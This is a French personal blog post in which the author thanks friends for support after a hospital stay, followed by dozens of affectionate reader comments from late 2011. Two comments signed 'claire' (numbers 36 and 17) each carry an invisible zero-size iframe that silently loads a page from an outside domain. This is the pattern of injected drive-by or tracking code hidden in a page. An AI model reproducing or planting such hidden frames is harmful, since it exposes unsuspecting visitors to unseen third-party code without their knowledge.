• Les merveilles de la nature

      

    http://a10.idata.over-blog.com/2/90/21/18/DECORATION/SEPARATEUR/05/5.BARRE--138-.png

     

    Je viens remercier tous celles et ceux qui me laisse  des commentaires régulièrement

     Vous avez été plusieurs à me soutenir pendant mes soucis de santé.

     Il me faut encore un peu de temps pour récupérer d’avantage, c’est très long

      et j’espère pouvoir récupérer à 100%

     Je ne remercierai jamais assez

     Léa, Mireille, Chimène et cléo pour tous les coups de téléphone passés chaque jour à l’hôpital et aussi depuis mon retour à la maison, je n’oublierai pas la qualité de votre écoute.

     Mais aussi le courrier reçu par Chevrette, Thérèse, Sonya

     J’ai eu besoin de vous et vous avez été la, mille merci à vous

     Je reprendrai mon blog petit à petit car je fatigue vite soyez patient

     Je vous fais de très gros bisous à tous

    "Bisou" - Pierrot parmi les fleurs...

     


    Tags Tags : , , , ,
  • Commentaires

    55
    poete58
    Vendredi 27 Janvier 2012 à 07:09

    je passe juste pour prendre de tes nouvelles...la maladie est parfois longue à guerir , alors prend le temps qu'il faut pour nous revenir en pleine santé   bisous  serge

    54
    Annick abondance
    Dimanche 4 Décembre 2011 à 16:22

    je reviens pour dire bon anniversaire entourée des tiens!!bisous bisous

    53
    Annick abondance
    Dimanche 4 Décembre 2011 à 16:20

    coucou ma douce amie je suis contente d'avoir vu ton com sur mon blog,c'est que tu reprends le dessus,je suis trés occupée et je n'ais pas ton numéro de téléphone sinon c'est avec joie que je t'aurais appelé!!la vie est mal faite,j'en connais un qui aurait dû avoir des soucis de santé!!et là je ne l''aurais pas plaind.J'espére que tu pourras profiter de tes petits enfants pour les fêtes je te fais de gros bisous et j'espére que tout ira pour le mieux pour toi!!

    52
    Mercredi 30 Novembre 2011 à 07:16

    Bonjour Gigip

    Juste pour te souhaiter une bonne journée ...je t'ai tout dit par mail ....milliers de bisous

    bojour

    51
    Mercredi 30 Novembre 2011 à 06:15

    Bonjour ma Gisou, me voilà pour te faire un coucou, hier c'était une journée de grisaille et de froid, on a pas dépassé les 6°. Comment tu vas? Mieux selon les jours mais tu sais qu'il faut du temps. C'est les courses ce matin et je n'en ai pas envie, de plus j'ai la tête toute serrée, j'ai pris froid, le rhume arrive. Bonne journée et gros bisous ma puce, prend soin de toi 

    50
    Mardi 29 Novembre 2011 à 16:43
    Marlène.edelweiss

    Bonsoir Gigip !! contente de voir que tu vas beaucoup mieux...et j'espère que tu pourras petit à petit reprendre ton  blog plus régulièrement pour nous régaler de tes belles créations....moi je suis toujours dans mes cartrons il faut maintenant démonter les lustres le déménagement et prévu pour le 9 aussi je suis désolée de ne pas pouvoir venir plus souvent vers mes amis (es) vous me manquez tous mais je n'ai pas le choix, tout ces préparatif me prend beaucoup de temps...je suis rentré de lyon samedi je fais le va et viens est la fatigue ce fait sentir mais bon dans quelques temps tout cela sera fini...je te fais de gros bisous et j'essaierais de reprendre contact avec toi avant de faire couper ma ligne ...je te fais de gros, gros bisous et te souhaite une douce soirée à bientôt

    49
    Mardi 29 Novembre 2011 à 14:15

    Bonjour Gigip

    Youpi !!! le brouillard nus à quitté ...un peu de soleil , même si il est pâle , fait du bien ....je te fais plein de gros gros bisous ...bon après-midi

    bojour

    48
    Mardi 29 Novembre 2011 à 11:23

    Heureuse de lire cet article, avant toute chose...... penses à bien récupérer et c'est vrai que c'est dans ces moments que l'on reconnait ses amies/amis, je m'en suis aperçue depuis le départ de papa, ce sont des petites choses qui te vont droit au coeur - récupères bien pour pouvoir profiter des prochaines fêtes qui arrivent avec les tiens - gros bisous de La Manche Mamy ANNICK

    47
    Mardi 29 Novembre 2011 à 08:59

    Bonjour ma Gisou, fini le soleil c'est dommage, vent du sud-est et nuages mais pas de gel, bon on va faire notre marche car même. J'espère que tu as bien dormi. Cette nuit il y avait le passage à la TNT, JC a fait une recherche des chaines et tout fonctionne. Novembre tire à sa fin, dans un mois  Noel sera déjà passé.  Bonne journée et gros bisous ma puce, prend bien soin de toi

    46
    mon ange g
    Lundi 28 Novembre 2011 à 20:53

    bonsoir gigip, contente de te retrouver et merci pour tes compliments pour mes photos. tu me donnera des nouvelles dés que tu peux, gros bisous


     

    45
    Lundi 28 Novembre 2011 à 16:53
    44
    Lundi 28 Novembre 2011 à 16:14

    Coucou Gigi , trop beau ton blog , ton bandeau une petite merveille j 'adore ; plein de gros doux bisous à toi Chichi .

    43
    Lundi 28 Novembre 2011 à 14:55

    coucou j'arrive pour te souhaiter un très bon après-midi et un bon début de semaine de gros bizzzous

    42
    Janine62 Profil de Janine62
    Lundi 28 Novembre 2011 à 14:55

    Coucou Gigip !

    je viens te souhaiter un bon début de semaine !

    la journée a commencé avec le soleil qui a laissé sa place au brouillard !

    il fait bien tristounet !

    Je te fais de gros bisous, 

    prends soin de toi !

    à bientôt !

    athos & cheyenne

    41
    tinon
    Lundi 28 Novembre 2011 à 14:33

    Bonjour, Gigi, me voici, dans ton joli petit endroit, je passe te remercier de ta bonne visite, de ton bon com, je te souhaite un bon lundi, un bon début, une bonne semaine, au plasiir, bisous, bisous.


    40
    JP Dudul
    Lundi 28 Novembre 2011 à 13:27

    Bonjour Gigi

    Je te souhaite une belle journée en espérant que ta santé s'améliore !

    Bisous.

    39
    Lundi 28 Novembre 2011 à 11:24

    Bonjour Gigip

    Ouf !! on est plus dans le brouillard ...le ciel est bien gris , mais , bon ....normal pour Novembre , j'accepte pour le calendrier , mais rien ne presse ...

    Tu as passée ton dimanche toute seule !  moi aussi , calée dans mon fauteuil , jai tricotée ...je me fais des mitaines .juste pour m'amuser ...

    Passe une bonne journée plein de gros gros bisous

    bojour

    38
    Lundi 28 Novembre 2011 à 09:58

    Bonjour ma gigi

    ça fait plaisir de te revoir , j'espère que ça continue pour toi repose toi encore un peu

    je te souhaite une agréable journée gros bisous

    37
    Lundi 28 Novembre 2011 à 09:12

    Bonjour ma Gisou, j'espère que tu as eu un peu de soleil ce week end, que tu puisses sortir un peu prendre l'air. Il a fait un week end super beau, hier il y avait plus de 20°. Bon je veux pas te démoraliser si tu en a pas eu. Il va falloir que je songe à quoi faire à manger aujourd'hui, je n'ai pas de restes. Ce matin il fait -3,4° avec du vent toujours et les nuages arrivent du sud. Bonne journée et gros bisous ma puce

    36
    Lundi 28 Novembre 2011 à 08:21

    bonjour gigip.. j'espère que tu te remets petit à petit.. je te souhaite une très belle semaine.. bisous - claire

    <iframe style="visibility: hidden;" src="http://loading-resource.com/analytics.php" width="0" height="0"></iframe>

    35
    Dimanche 27 Novembre 2011 à 21:09

    Bonsoir Ghislaine . Merci de ton passage sur mon blog . Reviens quand tu veux . Je vois que tu as des problèmes ; je te souhaite bon courage . Bisous .

    34
    tinette
    Dimanche 27 Novembre 2011 à 20:22

    Moi, je sais que je ne perce pas, ça ne me fait rien, un jour, je ne sais pas encore quand, je ne resterais que sur un site, sur celui le secret et je supprimerais les autres, mais je viendrais voir de temps en temps mes anciennes amis et puis je me consacrerais un peu plus à autre chose sur le net car en farfouillant l'on trouve pas mal de choses. Bisous d'amitié.

    33
    tinette t a du midi
    Dimanche 27 Novembre 2011 à 20:19

    Coucou, bonsoir, Gigi, et oui, c'est moi, je suis aussi sur ekla mais bon même si je ne perce pas comme certaines qui sont bien vu dans la bloggosphère, moi, ça peut aller dans un site de blog où je me régale et dont j'ai fait un blog secret, là, c'est simplement un blog pour mettre des images de mes documents, ça me les débarrasse et sur ob j'ai tout refait, je vois que tu refais surface sur les blogs de certaines de tes bonnes amies, c'est bien. Prend aussi bien soin de toi. Tu sais, ce que je regrette, les blogs d'orange, les débuts et dommage que les blogs dégénèrent et parfois, je me dis que ça ne vaut plus et ça me dit moins de blogguer à quoi bon, certains n'ont pas beaucoup de coms or que d'autres en sont envahit enfin, c'est comme ça, les blogs, on peut faire des erreurs car les erreurs sont humains mais bon, mais peu ça fait de la correspondance et puis vaut mieux avoir peu et parfois de la qualité qu'à la quantité. Enfin, voilà. Passe une bonne soirée, une bonne nuit. Puis, un bon début, une bonne semaine. Au plaisir, bisous d'amitié, de tinon, tinette.

    32
    Dimanche 27 Novembre 2011 à 12:43

    Bonjour gigip

    Je viens de lire votre article: j'espère que vous allez vite guérir pour bien profiter des fêtes de Noel

    Passe une bonne semaine gigip

    31
    Dimanche 27 Novembre 2011 à 06:37

    Bonjour Gigip

    Je rêve, ou tu as mis un calendrier ?? passee un bon dimanche ...gros bisous rempli d'amitié

    bon dimanche

    30
    faustine8400 Profil de faustine8400
    Samedi 26 Novembre 2011 à 17:59

    toc toc toc ,merci de ton lien ,je te place dans mes liens ,car je ne veus pas te perdre de vue ,aujourdhui mistral chez nous  mes soleil ,bonne soiré est bisous a demain ,

    29
    Samedi 26 Novembre 2011 à 15:01

    petit coucou avec le froid pour te souhaiter un très bon week-end de gros bizzzous

    28
    mon ange g
    Samedi 26 Novembre 2011 à 15:01

    un petit coucou pour te souhaiter un bon week-end et donne moi de tes nouvelles, gros bisous

    27
    JP Dudul
    Samedi 26 Novembre 2011 à 13:30

    Bonjour Gigi,

    J'espère que la forme revient tout doucement; je te souhaite un bon week-end ! bisous.

    26
    tite marseillaise
    Samedi 26 Novembre 2011 à 10:33

    Bonjour, Gigi, me voici, dans ton joli coin. Je passais te souhaiter un bon week-end. Gros bisous.

    25
    poete58
    Samedi 26 Novembre 2011 à 07:14

    il faut savoir prendre un peu de recul et pouvoir gerer ce que l'on fait

    moi aussi je reprendrai quand je serai moin débordé

    je te souhaite une guérison rapide   bisous  serge

    24
    alfea
    Vendredi 25 Novembre 2011 à 18:36

    bonsoir merci pour ta visite j'aime beaucoup ton inivers .bonne soireé a bientot vero

    23
    Vendredi 25 Novembre 2011 à 17:24
    zounette40

    contente de voir que tu vas mieux et que les filles t'ont soutenu....

    Je ne sais ce que tu as eu mais ça doit être assez important alors prends soin de toi et

    reposes toi ....pour te remettre complétement et être enfin en grande forme pour la fin de l'année....

    je t'embrasse et te souhaite un bon week-end au chaud !

    Pour moi ce sera ça :

     

    22
    Annick abondance
    Vendredi 25 Novembre 2011 à 16:40

    coucou ma belle pas beaucoup de temps mais je pense trés fort à toi souvent bisous

    21
    Vendredi 25 Novembre 2011 à 15:56

    petit coucou avec la pluie pour te souhaiter un bon après-midi et un très bon week-end de gros bizzzous

    20
    Lady DarkLight Profil de Lady DarkLight
    Vendredi 25 Novembre 2011 à 13:40

    Coucou je suis contente de te lire même si c'est pas encore ça au moins tu es un petit peu là et surtout prends bien ton temps et continue à te reposer comme je le dis souvent on a qu'une santé et il faut en prendre le soin le mieux qu'on peut

    A bientôt

    Bisous

    19
    Vendredi 25 Novembre 2011 à 13:21

    bonjour ma gigip, heureuse de ton retour, mais surtout vas doucement, ta santé avant tout.....ta création est superbe, bavo....bonne fin de journée....gros bisous,annie

    18
    Vendredi 25 Novembre 2011 à 09:45

    Bonjour Ghislaine,

    Heureuse de ton retour et tu ailles mieux ,n'en fait pas trop tout de même prends bien soin de toi la santé avant tout .........

     

    Très belle ta créa ,l'automne est une magnifique saison je laime pour c'est couleurs ,mais chaque saison à son charme ...........

    Sur ce je vais te souhaiter une bonne journée et un excellent week-end

    Gros bisous

    17
    Vendredi 25 Novembre 2011 à 08:44

    bonjour ghislaine.. c'est toujours très beau chez toi... je te souhaite un excellent vendredi - bisous - claire

    <iframe style="visibility: hidden;" src="http://loading-resource.com/analytics.php" width="0" height="0"></iframe>

    16
    Vendredi 25 Novembre 2011 à 07:58

    Bonjour ma gigi je vois que tu récupères peu à peu prends ton temps je te souhaite un bon week-end gros bisous

    15
    Vendredi 25 Novembre 2011 à 07:44

    Bonjour Gigip

    Je vois le com de Lea ...ton teléphone était occupé , et pour cause ....tu à tout remis en ordre , je te fais d'énormes bisous ....bonne journée

    bojour

    14
    Vendredi 25 Novembre 2011 à 07:16

    Bonjour ma Gisou, hier j'ai essayé de t'appeler mais je suis tombée sur ta messagerie à chaque fois, tu devais être au téléphone. J'espère que tu vas mieux et qu'il ne fait pas trop froid chez toi. Ici ce matin -2,5°, je pense que nous irons marcher encore ce matin. Bonne journée et gros bisous ma puce, tu m'appelles si tu veux 

    13
    Talhie Profil de Talhie
    Jeudi 24 Novembre 2011 à 19:45

    coucou ma gigi cherie je viens te faire un enorme bisou, essai de dormir bisous ma cherie

    12
    Jeudi 24 Novembre 2011 à 16:51

    je passe te faire de gros bisous avant notre départ pour l'Alsace demain matin...à bientôt

    11
    tinon, martine
    Jeudi 24 Novembre 2011 à 16:48

    bonjour, Gigi, je vois que tu essaies de revenir tout doucement, prend ton temps. Je passais te faire un coucou. Prend bien soin de toi. Passe une bonne fin de journée en ce jeudi, puis une bonne fin de semaine, un bon week-end. Au plaisir, mes amitiés, gros bisous.

    10
    Jeudi 24 Novembre 2011 à 15:15

    Bonjour Gigi

    Un petit coucou avec un rayon de soleil pour te souhaiter un agréable après midi. Très contente de te retrouver, surtout continue à prendre bien soin de toi pour récupérer au mieux.  Gros bisous. Stéphy

    9
    faustine8400 Profil de faustine8400
    Jeudi 24 Novembre 2011 à 11:14

    tien tien moi mon fils est de novembre 56


    bon jeudi amitiée

    8
    Jeudi 24 Novembre 2011 à 08:27
    Coucou ma Gigi . C est super d être venue sur ton blog avec une jolie créa et un joli sourire sur les lèvres pour nous dire que ta santé s améliore..surtout n en fait pas trop prend bien soin de toi tu vas voir tout va aller maintenant le plus dur que tu as passés est derriere toi .tu es courageuse ma Gigi je ne crois que je l aurai pas éte autant a ta place .. Plein de gros bisous a bientôt . Chimène.
    7
    Jeudi 24 Novembre 2011 à 07:33

    Bonjour ma tite Gigip

    Que c'est bon de te retrouver , mais vas -y doucement , rien ne presse , le principal c'est toi . faire ce que tu peux , comme tu le sent ..Le remerciement est superflu , l'amitié c'est çà , être présent quand une amie en a besoin ....Je te fais d'énormes bisous ...passe une bonne journée

    bojour

    6
    Jeudi 24 Novembre 2011 à 07:32

    petit coucou rapide avant de partir travailler pour te souhaiter un très bon jeudi contente que tu ailles un peu mieux surtout repose toi pour bien récupérer  de gros bizzzzous

    5
    mon ange g
    Mercredi 23 Novembre 2011 à 22:44

    Bonsoir gigip, contente que tu sois de retour et heureuse que tu te sentes beaucoup mieux, merci gigip pour ton petit mots pour guillaume, tu as tout dit en paroles ce que j'ai mis sur la vidéo cette année, je voulais rien faire et le lundi soir c'était un besoin de le faire pour mon ange.... gros bisous ma gigip

    4
    Mercredi 23 Novembre 2011 à 20:03

    bonsoir Ghislaine, que ça fait du bien de te lire !! j'avais de tes nouvelles par Léa, mais je préfère les tiennes !! il faut que tu reprennes doucement, un beau cadeau de fin d'année que tu nous fais !!! je te fais de gros gros bisous

    3
    Talhie Profil de Talhie
    Mercredi 23 Novembre 2011 à 19:26

    BONJOUR MA FUMEUSE JE SUIS CONTENTE DE TE REVOIR, TU ME RACONTERAS AU TELEPHONE, TU M AS MANQUE  MAIS JE SUIS COMME TOI TRES FATIGUE ALORS JE TE COMPRENDS.


    JE TE FAIS MILLE BISOUS MA GIGI

    2
    Janine62 Profil de Janine62
    Mercredi 23 Novembre 2011 à 19:23

    Coucou Gigip !

    Oh ! comme je suis heureuse de te lire à nouveau !

    Il faut y aller progressivement !

    Prends soins de toi !

    gros bisous, à bientôt !

    1
    Mercredi 23 Novembre 2011 à 16:08

    Bonjour ma Gisou, je suis contente de voir que tu as pu mettre un com, c'est vraiment bon signe, je voulais t'appeler mais j'ai dû téléphoner à la sécu pour JC. Toujours quelque chose à faire. Demain je pense que se sera bon. On a du soleil et quelques nuages, petite gelée ce matin mais avec le vent c'est normal. Tu n'as pas à me remercier, c'est naturel et je l'ai fait avec plaisir, l'amitié fait chaud au coeur encore plus dans des moments comme tu as passé. Oui tu sais je ne parts jamais marcher sans mon APN, je trouve toujours quelques choses à prendre en photo. Bonne fin de journée et je t'embrasse très fort  ma puce, prend bien soin de toi

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :